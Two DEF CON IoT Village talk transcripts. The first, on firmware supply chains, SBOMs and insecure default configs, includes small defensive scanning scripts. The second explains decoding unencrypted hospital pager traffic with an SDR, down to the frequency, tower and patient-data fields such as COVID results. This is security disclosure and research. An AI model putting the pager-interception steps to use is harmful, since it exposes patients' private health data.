So not only generating a software bill of materials, but being able to validate against the bill of materials, is critical. Let's shift gears. One thing I'd like to mention about company commitment: I just read that Microsoft has a product, Azure Sphere, that they're developing as a secure IoT chip and platform, and it's one way of approaching this: hey, let's control the ecosystem from the beginning and lock it down. And they've made commitments around the software bill of materials. It would be nice if more companies could control their environment the way Microsoft has the luxury to do. I think these kinds of commitments are going to be our way forward: following practices like this, generating our own software bills of materials, and taking a hard look at what's running on our devices. So let's switch to today. We have these devices, and we don't know what's running on them. Let's look at the CVE and CPE reporting mechanisms we have for tracking vulnerabilities in our software. CVE is Common Vulnerabilities and Exposures. It's a system that provides reference methods for publicly known information-security vulnerabilities and exposures. It's been around a while; MITRE is the organization that came up with it and helps maintain it. These are all the vulnerabilities that are discovered and reported for public knowledge. So it's great: we have a central place to report vulnerabilities. As well, we have the National Vulnerability Database with the US government, which keeps track of CPEs, or Common Platform Enumeration. This is a structured naming scheme for products: systems, software, software packages, et cetera. So there's a common way to put all this together. The only problem is that we have these frameworks for enumerating vulnerabilities and products, but there's not a lot of adherence or, sorry, hard regulation around how we use them. It's a very flexible system, and it works fairly well when treated well.
But there's a lot of inconsistency across the whole space about how we use CPEs, how we report them, how we link them to the products they apply to, et cetera. So let's look at some of these. Are CPEs just complete products? Is your whole camera system, that whole device, one product, one CPE? What about the component systems in there, your optics and the like, or the systems-on-chip running in there? Is each of those a CPE? Should each have its own product entry in that database? What about the libraries within? You're using OpenSSL, that's great, but what about libcrypto, which lives within it? Could that be separate from OpenSSL? Could that be its own product? So there are an awful lot of questions we need to answer with all that. If we look at something like OpenSSL, it's a commercial-grade secure sockets layer toolkit that also has cryptographic libraries in it. If you go to the NVD, the database, and look up OpenSSL, because you want to find out what product a vulnerability you found relates to, OpenSSL brings back 405 results. Now, every single version of that software is going to be another result, so 405 is not necessarily 405 different types of OpenSSL. But there are several. Here are a few examples that come back for OpenSSL. The very top one is usually what we think of as OpenSSL: the C/C++ library that is compiled into a lot of Linux systems. 0.9.7 was particularly vulnerable; there are a lot of different CVEs on it. Then 0.9.8, 1.0.1, et cetera. So there are a lot of different versions of that. The star fields we'll just gloss over for now, but those are further ways you can enumerate or specify which specific product this is when there are lots of different versions, betas, alphas, platforms, et cetera. But what are all these other CPEs we see out there? We see this Calderone pyOpenSSL. The first part is the vendor.
The second part is the actual product. So we have this pyOpenSSL. We can guess that would be a Python binding for OpenSSL, a Python library. Then we have lua-openssl on the next line, so we guess maybe that's a Lua binding. But then look at the next two. We have node-openssl, and if you go all the way down to the end, node.js is the target software: not the language, but the target software it's written for, which is Node.js, right? So it's a JavaScript module written for Node. But the very next line: vendor openssl.js_project, product openssl.js. So you have node-openssl, and you have openssl.js, and both have node.js at the end. So now someone writing for Node has their own way of specifying, and you have two different competing libraries; which one is which? And then you go down to the last one: openssl_project, openssl. Now that looks an awful lot like the first one, OpenSSL. So which one is that? Well, the hard part is, we really don't know. And if you dig into the metadata about this and actually go to the web page, the title doesn't help you very much: "OpenSSL project, OpenSSL." So we go into the references, and in the changelog we see a GitHub reference. And in there we have a rust-openssl. If you go in there and look, you see keywords like Rust; that's for the Rust language. So finding fully qualified CPEs can be a real challenge. The other thing that's a real challenge here is that we don't know how CPEs relate to each other. Does this Rust library depend on a certain version of OpenSSL, the C/C++ version on the first line? Does 0.9.2 map to 0.9.7, or 0.9.7a, or 1.0.1? We don't have these kinds of interrelations. So not only is generating an SBOM difficult, but developing a body of ground truth around an SBOM is extremely difficult.
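The vendor/product/target-software fields being discussed come straight out of the CPE 2.3 formatted string. A minimal parser makes the ambiguity concrete; note the example strings below are modeled on, not copied from, real NVD entries (the vendor names are placeholders), and real CPE matching also handles escaping and wildcard semantics that this sketch ignores.

```python
# CPE 2.3 formatted strings look like:
#   cpe:2.3:part:vendor:product:version:update:edition:language:
#           sw_edition:target_sw:target_hw:other
FIELDS = ["part", "vendor", "product", "version", "update", "edition",
          "language", "sw_edition", "target_sw", "target_hw", "other"]

def parse_cpe23(s):
    """Naive split of a CPE 2.3 string into named fields
    (ignores escaped colons for brevity)."""
    assert s.startswith("cpe:2.3:")
    values = s[len("cpe:2.3:"):].split(":")
    return dict(zip(FIELDS, values))

# Illustrative entries: two "OpenSSL"-named products distinguished
# only by their target_sw field.
node_ssl = parse_cpe23("cpe:2.3:a:example_vendor:node-openssl:*:*:*:*:*:node.js:*:*")
rust_ssl = parse_cpe23("cpe:2.3:a:openssl_project:openssl:*:*:*:*:*:rust:*:*")

print(node_ssl["product"], node_ssl["target_sw"])  # node-openssl node.js
print(rust_ssl["product"], rust_ssl["target_sw"])  # openssl rust
```

The takeaway matches the talk: nothing in the string itself relates `openssl`-for-Rust back to the C/C++ OpenSSL it wraps; that relationship lives nowhere in the scheme.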
And it's not a problem you think of, because you think it should be obvious, but who owns that? Is it the company's responsibility to add their platform to the CPE database so that vulnerabilities are found against it and there's reliable data there? Or is it the job of the people filing CVEs, the ones who find the vulnerabilities, to correctly find and identify the platforms if they're not there? So that's just a little background on the CPE system. They're good systems to start off with, but we need more on top of that. We need some ground truth. We need some ways to relate these things. By the way, there are some projects starting to put this together, but it's hard. Do you scrape the apt repos for which components are in OpenSSL or in HTTP servers? HTTP servers rely on OpenSSL, but which versions go with which? If you're installing it yourself, you know, because you look at the readme for the HTTP server installer and it tells you which versions you need, but we don't have any way of systematically obtaining that information. So let's go to a specific example of a vulnerability and look at the supply chain. We'll go with an old example, from four years ago. I'm not going to try to butcher Robert's last name, but Darkonius released a write-up on a router backdoor he had discovered, originating from a version of OpenWrt, an open source router operating system, that at that point was 10 years in the past. There was this backdoor hash, down in the pseudocode below, 1D680-whatever. If you entered that on the command line, you immediately got a root shell, and you can see the relevant code there. The problem is, this was just in an OpenWrt version that was 10 years old, from, I guess, 2006, right? But per the write-up, this was not on an OpenWrt router.
This was on a commercial router that had included OpenWrt and its libraries, and was using components such as this script called logon.sh as part of its operating system. So Darkonius found the backdoor in one or two sets of devices, and if you read through the comments, different people were chiming in: oh, I just tested against this, and I found it on this and this. So in the comments we found three, four, maybe five models of devices listed. But how is Darkonius supposed to know, and go out and find, every single device this relates to? Is that his responsibility? Is it even his obligation to go to the manufacturer of each device and tell them, hey, I found this in there? If you go and look for a CVE for this, you don't find one in the database. If you go even further, to the CPE, the platform entry for the device he looked at, you don't even find CPEs related to that specific device. And this is not a small device; this is a device that made its rounds, and you can find it in different places. So whose responsibility is it? In our dataset, when we looked across all of our firmware, we just did a string search for that magic hash. And lo and behold, we found 3,810 files that had this hash in them. And it wasn't just the hash, it was the full login script. But notice the file names: cli2, factoryboot.sh, login.sh. The original login.sh was part of the original package, but we found that same login.sh encapsulated in a command-line interface binary, a CLI or cli2, used by web servers and such on IoT devices, still running the same code from 2006 that, I'm sure, nobody knows is in there. The manufacturer doesn't even know it's there anymore. And the thing is, three major vendor companies have this: 44 different product models and 281 versions of this firmware. So this OpenWrt login.sh, this hash, has made its way into many, many different vendors' products.
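A sweep like the one just described, a string search for one known indicator across a firmware corpus, is mechanically simple. Here is a sketch; the marker bytes and the demo file names are made up stand-ins for the real backdoor hash.

```python
import os
import tempfile

# Hypothetical indicator-of-compromise; the real 2006 hash goes here.
BACKDOOR_MARKERS = [b"1d68example_backdoor_hash"]

def scan_tree(root):
    """Walk an unpacked firmware tree and return paths of files that
    embed any known marker, even inside larger binaries."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as f:
                    data = f.read()
            except OSError:
                continue
            if any(marker in data for marker in BACKDOOR_MARKERS):
                hits.append(path)
    return hits

# Tiny demo tree: one clean file, one "binary" embedding the marker,
# mimicking the login script ending up inside a CLI executable.
demo = tempfile.mkdtemp()
with open(os.path.join(demo, "cli2"), "wb") as f:
    f.write(b"\x7fELF...auth 1d68example_backdoor_hash root...")
with open(os.path.join(demo, "clean.bin"), "wb") as f:
    f.write(b"\x7fELF nothing to see here")

hits = scan_tree(demo)
print(hits)  # only the file embedding the marker
```

Searching raw bytes rather than parsing file types is exactly why the script turned up inside compiled binaries, not just shell scripts named login.sh.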
This isn't just one person accidentally downloading it and putting it in. This is the supply chain: people taking from A, who takes from X, who takes from Y, and it multiplies. This is the heart of the problem; this is why we're in the bind that we're in: the supply chain. We'll do one more example before we get into the juicier stuff, the statistics that we found. This latest set of CVEs we're talking about is Ripple20. I'm sure you've heard of it: 19 zero-day vulnerabilities amplified by the supply chain. Its title says it all, and this was reported two months or so ago. According to the white paper on it, this affects hundreds of millions of devices or more and includes multiple remote code execution vulnerabilities. That's the worst kind of vulnerability you'd want to have. Many major international vendors are suspected of being vulnerable, in medical, transportation, industrial control systems, et cetera. My previous example kind of laid the groundwork for how something like Ripple20 exists. So let's take one of the CVEs they reported as an example. This was published two months ago, June 17, 2020. The description: the Treck TCP/IP stack before this version allows remote code execution related to IPv4 tunneling. So this is a vulnerability, and they said it's bad: a base score of 10, critical, because of the remote code execution and how easy it is, theoretically, to get access to this TCP/IP stack. If we look at the CPEs, all CVEs have CPEs related to them, and we find these four Treck versions all rolled up underneath this Treck stack CPE. The problem is, when we look for this Treck stack and click through to the actual record in the CPE database, the quick info shows that the CPE for this Treck stack was created almost a month after the vulnerability was discovered. So there was no product entry for Treck TCP/IP.
We, well, not we, but the vulnerability researchers, had to invent the CPE that even belonged to the Treck stack. And then we go back to our original problem: if you have this Treck library and you're trying to figure out where it is in the world, you've got to do some detective work. And they did some detective work, because we don't have any CPE-to-CPE relationships, and even if we did, the CPE didn't exist. Nobody even knew that a Treck TCP/IP product existed. So reading through the paper about this, I almost imagine Luis from Ant-Man when he's being interviewed: where is Scott? And I kind of imagine him talking about it. Hey, Luis, where is Treck? And he goes, hey, man, see, that's complicated. See, Treck, there's some smart guys, but they need some help, right? So they go to Elmic Systems and they're like, hey, we need some developers. And Elmic Systems is like, yeah, we think you got it going on. So let's get together. And so they decided to work together for a while. But then something happened, and it's like, nah, homie, we're split. We're out of here. So Treck goes off its own way and Elmic Systems goes off its own way. And Treck is like, we got the Treck TCP/IP stack, we're going to market all this in the United States. And Elmic Systems is like, no, homie, we're no longer Elmic Systems; we're Zuken Elmic, and we got the KASAGO TCP/IP. I know it sounds like yours, but it's better, because it's been renamed. And you think you got the USA and you think you're all hot? Hmm, homie. Dang, we got all of Asia that we're going through. Meanwhile, you got security researchers in the middle going, hey, can you just tell me where Treck is? And Treck is like, hmm, see, it's complicated. And they go to Zuken Elmic, and see, they're just like, where's this KASAGO at? And we can't even figure it out, because their legal setup is cutting us out.
Whereas Treck is back here going, let's see, I got an uncle's girlfriend's boyfriend who had a relative named HP. And it's kind of like the 'rona virus, right? Like contact tracing: where's the contact on this? And their uncle's second cousin once removed is named Aruba, and I think we were at a party together. And meanwhile, Zuken Elmic is like, and JSOF is just like, where is this? And Zuken Elmic and Treck and all these people can't find out, and they're like, that's what I'm trying to say: it's complicated. Right? I'm sorry, I probably put you there. But I can imagine industrial control systems and industrial plants that have CIP-013 auditors or investigators coming in; I can see their first slide to the CIP-013 auditors being this picture of Luis and two words: it's complicated. Right? Because it is. Trying to find out where this Treck TCP/IP stack was, according to this paper, was pretty nuts. Okay. So anyway, it was developed somewhere in the 1990s to 2000s. It was included in a large quantity of firmware for devices. There have been various patches to it; some of the Ripple20 CVEs that were disclosed were patched in versions as far back as 2009. So you're a vendor: what products of yours contain this TCP/IP stack? How do you know? How do you update a device when a patch is released, or even know what version of the Treck stack you had in your device? How serious is the threat to your device? Right? Maybe it's not that problematic; maybe it was included but never used. So reproducing CVEs is problematic. The actual attack vectors are really hard to classify in these individual products. You potentially waste vendors' time on trivial vulnerabilities that really aren't practical. So really, the bottom line for vendors is: how much money do you spend trying to figure out whether you have to develop a firmware patch for software that you don't even know is in your device, and how likely is it that the software is even exploitable? Right?
So it's a hard, hard question. I'll come back to the software bill of materials in a little bit, but for right now, let's shift over to our database and look at some of the vulnerability statistics we have here. Hopefully you find this enlightening; I certainly did. This just represents a slice of the industry: we have medical devices, we have industrial control systems gear, we have all sorts of different sectors and verticals represented in our dataset. So here we go. All right: /etc/resolv.conf, popular nameservers. 127.0.0.1, not surprisingly, is one of the top ones. We've got some Google addresses there, 8.8.4.4. And then the next three down that you see, the 168.x addresses, are all Asian DNS servers. And then you've got some strange noise in there: 192.168.x addresses, someone.com, a couple of other corporate ones. So if you have all these devices going to the US but they have Asian domain servers, you're going to take a performance hit, or vice versa. How do you know where these products are going and which nameservers they're hitting? I saw some forum posts about 192.168.0.7; maybe the people who made this resolv.conf had it in a test setup and were just copy-pasting from a forum into this file. someone.com, that actually was one vendor, but it's in a whole slew of firmware for all sorts of different products in their product line. So you can see not only is that illustrative of someone putting that in as an example they found somewhere, but it's in all their resolv.conf files; they just copy and paste that file into all their other firmware. So where are the checks and balances on what's actually running in there? Even something like corp.ubnt.com: corp.ubnt.com doesn't exist, but it's configured on a device as a resolver. So if someone decides to stand up that hostname and start serving requests on it, you could have some interesting results. Here's another one: TTY counts in /etc/securetty.
So if you look at the bottom, the /etc/securetty file allows you to specify which TTY devices a root user is allowed to log in on. Let's just make one thing clear: once you have an IoT device in production, you probably shouldn't be logging into that device at all. Most normal operation shouldn't allow anybody from the outside to ever tunnel into that device remotely, certainly not as a root user. So I want to highlight this 196 / 1,486 entry. What that means is that these counts are the number of TTYs listed as approved TTYs that root can log in on: 1,486 firmware have an /etc/securetty with 196 approved TTY locations for root to log in on. All right. So I tracked this one down, because it's just like, where is this anomaly from? I found it in the Yocto Project, which is a way to programmatically and easily generate a custom-built Linux operating system for your project, and this particular file that I found was from 2013. So here is the supply chain: someone who's building a system and wants a securetty pulls down this file, which is pretty permissive, probably for development purposes and never really supposed to be in production, and yet here it makes its way into all these devices. So, the supply chain in action. All right: number of valid login shells. This is /etc/shells, the number of acceptable shells that you can log in with. And most have one. Again, whether you should have a shell people can log into at all is questionable, but at least the majority have only one. But then we have this 10-login-shells entry. And I guess what they want by this, a little tongue in cheek, is that if hackers are coming in and are used to having all their key bindings in their environment files for bash, they want to make it easier for them, so they're just going to throw bash in there. And if you're an ash or zsh person, we've got you covered; you can log in however you want.
That's a little tongue in cheek, of course, but that's what the 10-shell number represents. An additional thing here that was kind of concerning is when I delved into the actual types of devices at this source, there were over 60 of these — models of patient monitoring health systems. So over 60 different models, which represents however many thousands or hundreds of thousands of health systems — patient monitors that are sitting bedside — have 10 or so login shells that somebody could log in with. These are just configuration examples in the supply chain. I'm not saying these are actual vulnerabilities; they're just interesting anomalies from the supply chain. So here's a question — we're about out of time, so we're just going to go through these quick. Firmware where the root user has a login shell: 15,345. So 30% of all the firmware that we looked at has some sort of login shell. Whereas if you don't want root to log in, you use /sbin/nologin. Guess how many? Over/under one? We found one firmware that actually had /sbin/nologin in it. Okay. Firmware with keys in authorized_keys. Now this is a bad backdoor, because this basically says if someone SSHes into your box and their key matches a key in the authorized_keys file, they get to log in without any password. So this is a classic backdoor, whether it was purposefully put there or not. What's the over/under? 175. 175 firmware — and remember, this is firmware; who knows how many devices that represents. This is 12 different vendors with these keys. And there were over 29 known_hosts files — these were really interesting, to see where they came from and the different medical facilities and other places that had known hosts in them. ClamAV: only four firmware had any kind of open-source antivirus software. Firmware running httpd with mod_autoindex — autoindex is a way to auto-index files on your web server when there isn't any matching index file.
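Both of those checks — baked-in authorized_keys files and a root account with an interactive shell — are mechanical to automate. A sketch with my own function names, assuming an extracted root filesystem and a standard seven-field /etc/passwd layout:

```python
from pathlib import Path

def find_key_backdoors(rootfs: str) -> list[str]:
    """Non-empty authorized_keys baked into a firmware image: whoever
    holds the matching private key logs in with no password."""
    return [str(p) for p in Path(rootfs).rglob("authorized_keys")
            if p.stat().st_size > 0]

def root_has_login_shell(passwd_text: str) -> bool:
    """True if root's shell field in /etc/passwd is interactive
    rather than /sbin/nologin or /bin/false."""
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if fields and fields[0] == "root" and len(fields) >= 7:
            return fields[6] not in ("/sbin/nologin",
                                     "/usr/sbin/nologin", "/bin/false")
    return False
```

Run against a corpus, the first function is how you get a number like 175, and the second is how you find that lone /sbin/nologin holdout.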
Autoindex is a great way to troll through a device's directories. So these are, again, things that are questionable that are in our configs. Firmware starting TTYs in inittab: quite a few firmware are starting TTYs, but not that many distinct files. So here we're seeing amplification in the supply chain — here are 63 files, but these 63 files are found in 4,729 devices. Here's a particularly bad one. Firmware with PHP defaulting to display_errors on: 332 firmware. Using SQL injection or any kind of command injection, I love it when developers leave display errors on, because when I make a mistake, it tells me exactly what's there. The problem is that PHP by default allows display errors — you have to explicitly turn it off. So maybe we should be making software that doesn't have defaults that are vulnerable like this in their default configuration. All right, next part. Firmware with insecure default DES encryption. So if you don't specify the type of encryption for your passwords, you're going to use DES, which is a bit weaker: 318 firmware, 29 files. But even worse, there were firmware that specified the flag to turn on MD5 as their password crypt. It was 12 firmware. Fortunately it's small, but they're still out there — I have no idea where those are, but they're out there. Firmware with a master.passwd with no password on root — what's the over/under, 100 devices, 10 devices, a million devices? Only seven. But still, one file made its way in with no password on root. MySQL binding to 0.0.0.0 — so listening to the world and allowing people to go right to your MySQL: 26 devices. Firmware with Redis the same way, a default world bind — if you don't specify a bind, by default it will allow you in: three. It's only one file, but still, three firmware allow you into their Redis by default. Next up: the average number of unsafe function calls per firmware.
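Before the next stat: the config checks just described are equally mechanical to script. A hedged sketch — these are my own helpers, and the treat-absence-as-insecure defaults follow the talk's claims about PHP and older MySQL builds rather than any one version's documentation:

```python
def php_display_errors_on(ini_text: str) -> bool:
    """Per the talk, display_errors is effectively on unless the ini
    explicitly disables it, so treat an absent directive as on."""
    for line in ini_text.splitlines():
        line = line.split(";")[0].strip()          # strip ini comments
        if line.lower().startswith("display_errors") and "=" in line:
            return line.split("=", 1)[1].strip().lower() in ("on", "1", "true")
    return True

def mysql_binds_world(cnf_text: str) -> bool:
    """True when mysqld will listen on every interface: an explicit
    bind-address = 0.0.0.0, or no bind-address at all (the old default)."""
    for line in cnf_text.splitlines():
        line = line.split("#")[0].strip()
        if line.startswith("bind-address") and "=" in line:
            return line.split("=", 1)[1].strip() in ("0.0.0.0", "::")
    return True
```

Point these at every php.ini and my.cnf pulled out of a firmware corpus and you get counts like the 332 and 26 above.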
So this stat — unsafe function calls — is stuff like strcpy, memcpy, all those unbounded ones like Ripple20 found, and malicious ways to use standard allocation functions without checking lengths and things like that. How many do you think per firmware? 1,500 and some average unsafe function calls per firmware. Okay. Number of firmware with unsafe function calls? 53,000. That's over 50%. And those are just the ones that are named — we haven't even trolled through them with function hashing and such to find the unlabeled ones that also call these. All right. Here's the last one: firmware exporting NFS mounts to the world. Over/under on this one? 42. There are four files that contribute to 42 firmware mounting to the world — such as exporting / to *, read-write. So you can, as root, write to / as user ID zero. So these are all questionable configs that have made their way in — just fun things that I found trolling through. And finally, what would a talk like this be without talking about the common passwords and all that? So you see here, amplified again, the supply chain: the file counts are the light orange, and the dark orange is how many firmware actually use those files. And the number one being admin — it's only in five files in the password file, but those five password files are found in 470 firmware, which may represent hundreds of thousands of devices where we've cracked the password for admin. I'll give you a ten-to-one guess what the password is going to be for that admin user. All right. Anyways, in conclusion, it's all about the software bill of materials — drive towards generating and validating these.
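One aside before the wrap-up: a first-pass triage for those unsafe libc calls is also scriptable. This is a deliberately crude sketch of my own — matching symbol names as raw bytes over-counts compared with actually parsing each ELF's dynamic symbol table, but it's cheap enough to run over an entire corpus:

```python
import re

# Classic unbounded/length-unchecked libc names to triage for.
UNSAFE = (b"strcpy", b"strcat", b"sprintf", b"gets", b"memcpy")

def count_unsafe_refs(binary: bytes) -> dict[str, int]:
    """Crude count of unsafe-libc symbol names appearing in a binary blob.
    A real pass would walk the ELF symbol table; this is cheap triage."""
    counts = {}
    for name in UNSAFE:
        n = len(re.findall(re.escape(name) + rb"\b", binary))
        if n:
            counts[name.decode()] = n
    return counts
```

Summing these per image, then averaging over the corpus, is the shape of the "1,500-odd per firmware" statistic above.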
The path forward is manufacturers implementing software inventory systems; developers being diligent and reporting all the components used in their systems; consumers holding a high standard for transparency and favoring and buying from companies that provide that info; the policymakers who help guide unified standards and reporting formats; and our security community here developing tools to assist in automating the inventory. If we're doing the same thing in five years that we're doing now, we're falling behind. We should be using machine learning, we should be using tools and other things to help us inventory and validate these things — not just on the front end, but on the back end too, to validate that patches and updates are what they say they are and contain what we think they contain. Thanks to all my team at Finite State and to a lot of good research that's been done in the industry. Finally, obviously the question and answer for this session is going to the Discord, but I've had a fun time talking to you all. Peace out. Hope you enjoy the rest of DEF CON and IoT Village. Thank you so much for having me.
IoT device manufacturers have no idea what's running on their devices -- they really don't. In 2002, then-US Secretary of Defense Donald Rumsfeld brought public attention to the notion that information can be divided into three categories: known knowns, known unknowns, and unknown unknowns. As hackers, how can we apply this formulation to IoT vulnerabilities? The known knowns: Vulnerabilities that have been explicitly discovered through scanning and testing. The known unknowns: Newly created software that has yet to undergo any application security testing. The unknown unknowns: Systems that the defender does not know about. There is, in fact, a fourth dimension: unknown knowns, which comprise “that which we intentionally refuse to acknowledge that we know” or “do not like to know.” The unknown knowns: Vulnerabilities that are known to exist, but that have not been associated with all the systems they actually affect. In this talk, we report on IoT device vulnerability findings at massive scale, as a result of our firmware collection and analysis. For this research we have selected approximately 50k firmware images, representing over 7M files, 10k products, and 150 vendors, spanning many different architectures and operating systems. We will highlight some of the trends we've uncovered in supply chain vulnerabilities, and reveal specific examples of device backdoors, botnets, and vulnerabilities discovered in medical, home, and commercial device firmware.
10.5446/50736 (DOI)
Hey everyone, welcome to my talk, Pandemic and Plain Text. My name is Troy, aka Waveguide on Twitter. I'm an RF engineer in the aerospace industry, and I was formerly a security engineer in the access control and lock industry for a number of years. I also host the channel over at hackerwarehouse.tv, and I just want to give a special thanks to IoT Village and to DEF CON Safe Mode for hosting this talk, and to my friend Voxel for this really cool setup and background. So let's get started: Pandemic and Plain Text. All right, the purpose of this talk — and I want to be really clear — is to stop the use of insecure communications in hospitals by shining light on the insecure wireless communications that are accidentally leaking your health data and violating your privacy laws. I'm not here to bash hospitals, I'm not here to bash the medical industry. I just want to bring to light that there is this leak happening, that it's been happening for 20 years, and that right now, in the middle of this pandemic, I think it's really important that we pay attention to this and that we fix this problem. And just to note, none of your healthcare providers are really doing this intentionally. It appears they're accidentally leaking your information and they just don't know it. And if you don't want to watch the rest of this talk, the TL;DR is: hey, your COVID test results are literally being broadcast from mountaintops. Yeah, so the story behind this is, if you go back to November or December, a lot of us were looking at Twitter and watching this pandemic come across China. And we were really asking ourselves these questions, like, is this real? Is this going to come over here? Then it kind of came across the ocean and we got to ask these questions about, you know, do we have enough beds and PPE, are there any cries for help, and are there going to be shortages? And I just started having all these questions, and I really was looking for data on this stuff.
And like most people, I found it kind of hard to sift through all the incoming data that we get through the news. And I just really wanted the hard data. And you know, I wanted to know, is it affecting my community? If I could see the data, then I would be able to answer these questions. And I remembered that I thought I knew a way to answer these questions using RF and wireless. And that was through something called POCSAG, which is pagers. I remember a couple of years ago we did a show on Hacker Warehouse TV about how to decode pager messages that are freely being broadcast over the air. And when we did that, we saw a lot of things that were medical related. And I thought, well, maybe it's a good time to revisit that and see what we can find, and see if any of these questions could be answered with data over the POCSAG network. All right, well, just a little legal disclaimer for this talk. I'm not a lawyer, but I think the following is true. Possessing a software-defined radio? Yeah, that's totally legal — amateur radio operators do that across the globe. Receiving 900 MHz signals on those SDRs? Yeah, of course that's legal. Listening to audio on those signals, just voice or tones? Yep, nothing special there. Decoding the audio of those signals? Well, that depends: are they encrypted? In this particular case, for this talk, no — not even a little bit. This is all plain text tones, and we're just decoding them. That is legal. Decoding secure messages or anything that's encrypted? That is not legal, and in this particular case, nothing was decrypted. Distributing or sharing patient information? Obviously, that is not legal. Don't distribute any personal information or any sensitive information that you may receive over these plain text broadcasts. But for the hospitals that are broadcasting the patient information from a mountaintop antenna, apparently that's perfectly legal. I don't know.
Maybe that's just a HIPAA violation — again, I'm not a lawyer, but let's continue. All right. Is this a new vulnerability? The answer, unfortunately, is no. I'm not, unfortunately, dropping zero-days here. This has been around for quite some time — I think it was brought up at DEF CON 5, and it was brought up again back in 2016. There was also the Holy Pager artwork — I believe it was in Chicago — which would intercept all POCSAG pager messages and forward them randomly to one of three pagers on display. And then it would print out a continuous roll of receipt paper, making a big pile of personal information that they automatically redacted. So that was pretty cool. Then back in 2018, this was brought up again. It was kind of localized to five or six hospitals. Digging into that case, it seemed that the response was that intercepting or decoding these tones was a sophisticated attack. I think you'll see at the end of this talk that that is not the case at all. All right. Where to begin? In order to do this, you have to get some gear. Back in 1997, I would have agreed that it's a sophisticated attack, but not today. Back then, you'd have to get a scanner. You'd have to modify it with something from L0pht Heavy Industries like this POCSAG decoder from back in the day — I think that thing was 60 bucks. Then you would go over to this Dr. Who's radio phone site, which I used to frequent quite often when I was a teenager. And then you would have to stuff all that back into the scanner, and then you could decode these tones. And so, yes, back in 1997, that was a sophisticated attack. However, in 2020, you just have to buy a $20 SDR, and you can get those from Hacker Warehouse, off Amazon, off eBay. It's really just too easy now. You really just plug in the SDR, download some software, and then you tune to the signal. It's almost as easy as getting in your car and tuning in a frequency on your radio. You pick one of these frequencies here.
These have been around for 20 years; the pager networks really haven't changed. And you tune into them and you're going to hear some tones. Now, the frequency used for this talk was 929.596. I localized the signal — it's coming from Santiago Peak, the antenna farm up there. And it has a lot of coverage: I was picking up hospitals from about a 70-mile radius. So a lot of stuff from Riverside, Pomona, down to the San Diego area, Irvine — not so much from LA County. But everything you see there in the circle was definitely within range of this tower. And the way the towers work is they relay off of one another. So a lot of times, if you're not close to this tower, you'll be close to another tower, and you can find a signal that way. These signals are very strong — when you plug in the software and tune to a station, they are probably the strongest stations around. OK, so as far as the signal goes, it sounds a little something like this. This is provided by MNXR; they said they got it from Matt Damon — I'm not sure if that's true. But it sounds kind of like an old modem tone, right? So that's what you're listening for. When you tune to that 929 frequency, you're going to hear a whole lot of that. OK, so the audio tone you just heard is basically a little more advanced than the DTMF tones on a keypad. Whenever you press 1 on your telephone, you get a combination of 1209 Hz and 697 Hz, and that's how the system knows that's a 1. Similarly, with frequency-shift keying, whenever you lock onto that 929 MHz signal, those audio shifts you hear are creating ones and zeros in the bit stream. And that's, in a nutshell, how FSK works. Remember, I'm watering this down for all audiences. But the point is the tones create the frequency-shift keying, which then creates data. And a Windows program like PDW will decode that data and just put it across your screen like this. And so this is actually what you just heard, decoded.
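To make the FSK idea concrete, here's a toy two-tone modem in pure Python. The mark/space frequencies are illustrative audio tones of my choosing (not the real POCSAG FM deviation, though 1200 baud is one of POCSAG's standard bit rates): modulate a bit string into samples, then recover it by comparing per-bit tone energy, which is all a decoder like PDW is doing at heart:

```python
import math

RATE = 48_000                     # samples per second
BAUD = 1_200                      # one of POCSAG's standard bit rates
MARK, SPACE = 1_200.0, 2_200.0    # illustrative tone pair for "1" / "0"

def modulate(bits: str) -> list[float]:
    """Audio-FSK a bit string: one tone burst per bit period."""
    samples, spb = [], RATE // BAUD
    for bit in bits:
        f = MARK if bit == "1" else SPACE
        samples += [math.sin(2 * math.pi * f * n / RATE) for n in range(spb)]
    return samples

def tone_energy(chunk: list[float], freq: float) -> float:
    """Correlate a chunk against a reference tone (poor man's Goertzel)."""
    i = sum(s * math.cos(2 * math.pi * freq * n / RATE) for n, s in enumerate(chunk))
    q = sum(s * math.sin(2 * math.pi * freq * n / RATE) for n, s in enumerate(chunk))
    return i * i + q * q

def demodulate(samples: list[float]) -> str:
    """Decide each bit by which tone carries more energy in its period."""
    spb, bits = RATE // BAUD, []
    for k in range(0, len(samples) - spb + 1, spb):
        chunk = samples[k:k + spb]
        bits.append("1" if tone_energy(chunk, MARK) > tone_energy(chunk, SPACE) else "0")
    return "".join(bits)
```

A round trip — `demodulate(modulate("10110010"))` — gives back the original bits, which is the whole point: no keys, no secrets, just tones.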
It's the standard DEF CON "drink all the booze, hack all the things" mantra. So that's how this works. It's really not encrypted — it's all plain text. It's just a little bit more advanced than DTMF tones on a telephone, and you tune into the tones and you get the data on your screen. It's really that simple. So now that you know how it works and how to decode a POCSAG signal, let's shift back to the hospital research. So I did a little digging here. There was this research about the use of technology for patient-care-related communications. The gist of that paper was that 80% of hospitals still use pagers, and in that paper they actually believe that pagers are more secure than cell phones. You can check out this link and read more about that. But the quote that stood out to me was this one: "They send only numeric messages or basic text messages," says Dr. So-and-so. "This way no confidential information can get in the wrong hands. That could happen with a cell phone." And I think that is the heart of this problem. Pagers are thought of as a very good tool and a secure tool to use in hospitals, when in fact they're not. So if we know that, then it kind of makes sense why all the HIPAA compliance effort is being put into securing the network within the hospital, while the pager usage is not really thought of as an open door — it's thought of as more secure than that network. And what I found was that the pager usage actually isn't. So if we go back to that quote — they send only numeric messages, basic text messages, and no confidential information can get in the wrong hands — the reality is actually quite different. So here we go. This is a basic pager message from a hospital. It's leaking your personal information, and it even includes COVID results. This is one dissected. So I'll walk through this.
You have the pager number, followed by the time the message was sent and the message date/time; then FLEX, which is a paging protocol related to POCSAG; then alpha, which defines the type of FLEX message — there are different types. It includes this automated system name, which I'll touch on in a bit. It has the hospital name. It then goes into "requested" — this is a bed request — last name, first name, age, gender, isolation protocol, which tells you the PPE: there's "droplet," which is like a face mask; sometimes it says full PPE; sometimes it says face; different things there. Then the origin unit — sometimes it's a doctor's name, sometimes it's a unit; in this case, it was the emergency department, or usually that's "emergency something." Sometimes it's a full doctor's name. And then in the comments right there, it says COVID positive or COVID negative. So that is a basic pager message that is not supposed to have any of your personal information in it. Because of COVID, these have gotten quite bloated with personal information — they didn't used to be this big. And that is the point of this discussion: this is what a simple text message looks like now, and it has too much personal information in it, and a lot of privacy violations as well. So once I saw that, I mean, what did I do? I decided just to let that decoder run. So I ran it for 52 days, mid-March through August 1st, 2020, and COVID-related results would come across the screen. 